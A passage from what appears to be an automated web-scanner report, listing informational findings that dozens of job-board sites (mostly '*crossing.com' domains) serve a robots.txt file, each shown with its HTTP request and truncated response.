GET /robots.txt HTTP/1.0
Host: www.customerservicecrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:06 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 08:30:56 GMT
ETag: "1cb8255-1bf2-476fa9d12d000"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 7154
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.20. http://www.dbacrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dbacrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dbacrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:12 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:49:42 GMT
ETag: "1ba0379-1a83-483c75c976980"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.21. http://www.dentalcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dentalcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dentalcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:12 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 28 Oct 2009 08:31:13 GMT
ETag: "24d02f0-1bf0-476fa9e163640"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.22. http://www.designingcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.designingcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.designingcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:20 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:41:17 GMT
ETag: "22f14f6-1a84-483c73e7db940"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6788
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.23. http://www.diversitycrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.diversitycrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.diversitycrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:26 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 28 Oct 2009 09:06:41 GMT
ETag: "26802ff-1bd8-476fb1cecea40"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 7128
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow: /xaja
...[SNIP]...

19.24. http://www.dotnetcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dotnetcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dotnetcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:29 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 09:07:05 GMT
ETag: "21e80c1-1bd8-476fb1e5b2040"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 7128
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow: /xaja
...[SNIP]...

19.25. http://www.ecommercecrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ecommercecrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ecommercecrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:40 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 09:08:25 GMT
ETag: "1ba82e2-1bd8-476fb231fd440"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 7128
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow: /xaja
...[SNIP]...

19.26. http://www.edfed.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.edfed.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.edfed.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:50 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Thu, 19 Apr 2007 04:58:03 GMT
ETag: "c90329-22b8-42e700c372cc0"
Accept-Ranges: bytes
Content-Length: 8888
Connection: close
Content-Type: text/plain; charset=UTF-8

# Robots.txt file for http://www.edfed.com

User-agent: Googlebot
Sitemap: http://www.edfed.com/sitemap.xml
Sitemap: http://www.edfed.com/sitemap1.xml
Disallow: /admin
Disallow: /calculator
Disallow:
...[SNIP]...

19.27. http://www.editingcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.editingcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.editingcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:48 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 08:31:31 GMT
ETag: "1ba0196-1bf0-476fa9f28dec0"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.28. http://www.educationcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.educationcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.educationcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:50 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 08:31:50 GMT
ETag: "1d28342-1bf0-476faa04ac980"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.29. http://www.employmentauthority.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.employmentauthority.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.employmentauthority.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:56 GMT
Server: Apache
Last-Modified: Fri, 14 Mar 2008 07:05:17 GMT
ETag: "9f0a80-21a0-448604ade8540"
Accept-Ranges: bytes
Content-Length: 8608
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: Googlebot
Sitemap: http://www.employmentauthority.com/sitemap.xml
Disallow: /htdocs/contact_manag
Disallow: /htdocs/contact_test
Disallow: /htdocs/css
Disallow: /htdocs/dataupdate
Disallow
...[SNIP]...

19.30. http://www.employmentcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.employmentcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.employmentcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:58 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 28 Oct 2009 12:17:01 GMT
ETag: "248055c-1bd8-476fdc59c4940"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 7128
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow: /xaja
...[SNIP]...

19.31. http://www.energycrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.energycrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.energycrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:00 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 28 Oct 2009 08:32:11 GMT
ETag: "26c81a4-1bf0-476faa18b38c0"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.32. http://www.engineeringcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.engineeringcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.engineeringcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:09 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:42:06 GMT
ETag: "1d701e0-1a84-483c741696780"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6788
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.33. http://www.entrylevelcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.entrylevelcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.entrylevelcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:11 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 28 Oct 2009 08:32:32 GMT
ETag: "26882ea-1bf0-476faa2cba800"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.34. http://www.environmentalcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.environmentalcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.environmentalcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:08 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:45:52 GMT
ETag: "22a9661-1a83-483c74ee1e400"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.35. http://www.environmentalsafetyhealthcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.environmentalsafetyhealthcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.environmentalsafetyhealthcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:17 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 08:32:52 GMT
ETag: "1d3833d-1bf0-476faa3fcd500"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.36. http://www.erpcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.erpcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.erpcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:17 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 29 Apr 2010 11:41:11 GMT
ETag: "270010e-1b0a-4855e9a6b83c0"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 6922
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow:
...[SNIP]...

19.37. http://www.execcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.execcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.execcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:22 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 09 Apr 2010 05:40:56 GMT
ETag: "26d82d7-1a84-483c73d3d4a00"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 6788
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.38. http://www.facilitiescrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facilitiescrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.facilitiescrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:54 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 09 Apr 2010 05:49:26 GMT
ETag: "25a8493-1a83-483c75ba34580"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.39. http://www.financialservicescrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.financialservicescrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.financialservicescrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:55 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:44:14 GMT
ETag: "1ca0141-1a83-483c7490a8780"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.40. http://www.foodservicescrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.foodservicescrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.foodservicescrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:56 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 09:10:18 GMT
ETag: "1c982c1-1bd8-476fb29dc1280"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 7128
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow: /xaja
...[SNIP]...

19.41. http://www.fundraisingcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fundraisingcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fundraisingcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:25 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 08:33:14 GMT
ETag: "1cd0300-1bf0-476faa54c8680"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.42. http://www.giscrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.giscrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.giscrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:27 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 08:33:37 GMT
ETag: "1c980fc-1bf0-476faa6ab7a40"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.43. http://www.governmentcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.governmentcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.governmentcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:49 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 09:10:43 GMT
ETag: "2282046-1bd8-476fb2b598ac0"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 7128
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow: /xaja
...[SNIP]...

19.44. http://www.graduateschoolloans.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.graduateschoolloans.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.graduateschoolloans.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:58 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Thu, 03 May 2007 04:52:07 GMT
ETag: "da0c63-20f7-42f8998c64bc0"
Accept-Ranges: bytes
Content-Length: 8439
Connection: close
Content-Type: text/plain; charset=UTF-8

# Robots.txt file for http://www.medicalschoolloans.com

User-agent: Googlebot
Sitemap: http://www.medicalschoolloans.com/sitemap.xml
Disallow: /admin
Disallow: /calculator
Disallow: /chat
Disa
...[SNIP]...

19.45. http://www.healthcarecrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.healthcarecrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.healthcarecrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:04 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 28 Oct 2009 08:33:53 GMT
ETag: "25c8145-1bf0-476faa79f9e40"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.46. http://www.helpdeskcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.helpdeskcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.helpdeskcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:09 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 09:11:11 GMT
ETag: "1d8819c-1bd8-476fb2d04c9c0"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 7128
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow: /xaja
...[SNIP]...

19.47. http://www.hospitalitycrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hospitalitycrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hospitalitycrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:09 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 28 Oct 2009 08:34:13 GMT
ETag: "25d03f2-1bf0-476faa8d0cb40"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.48. http://www.hrcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hrcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hrcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:19 GMT
Server: Apache
Last-Modified: Tue, 13 Apr 2010 09:21:30 GMT
ETag: "1d501f7-1a82-4841ac9699a80"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6786
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seoDisallow: /soap
Disallow: /xajax_js
Disallow: /h
...[SNIP]...

19.49. http://www.huffingtonpost.com/2011/01/12/sarah-palin-arizona-shooting-statement_n_807833.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/2011/01/12/sarah-palin-arizona-shooting-statement_n_807833.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.huffingtonpost.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.8 (Unix)
Last-Modified: Fri, 21 May 2010 12:59:43 GMT
ETag: "3eca348-b5-4871a43c92dc0"
Content-Type: text/plain; charset=utf-8
Date: Fri, 21 Jan 2011 22:28:28 GMT
Content-Length: 181
Connection: close

# All robots will spider the domain
User-agent: *
Disallow:

User-agent: *
Disallow: /backstage/

User-agent: *
Disallow: /blackberry/

User-agent: *
Disallow: /users/becomeFan.php

19.50. http://www.hvaccrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hvaccrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hvaccrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:33 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 08:34:49 GMT
ETag: "1c7854c-1bf0-476faaaf61c40"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.51. http://www.informationtechnologycrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.informationtechnologycrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.informationtechnologycrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:50 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:45:04 GMT
ETag: "1cc01f8-1a83-483c74c057800"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.52. http://www.insurcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.insurcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.insurcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:47 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 08:35:10 GMT
ETag: "22a945c-1bf0-476faac368b80"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.53. http://www.intellectualpropertycrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.intellectualpropertycrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.intellectualpropertycrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:47 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:50:29 GMT
ETag: "22f08da-1a83-483c75f649340"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6787
Connection: close
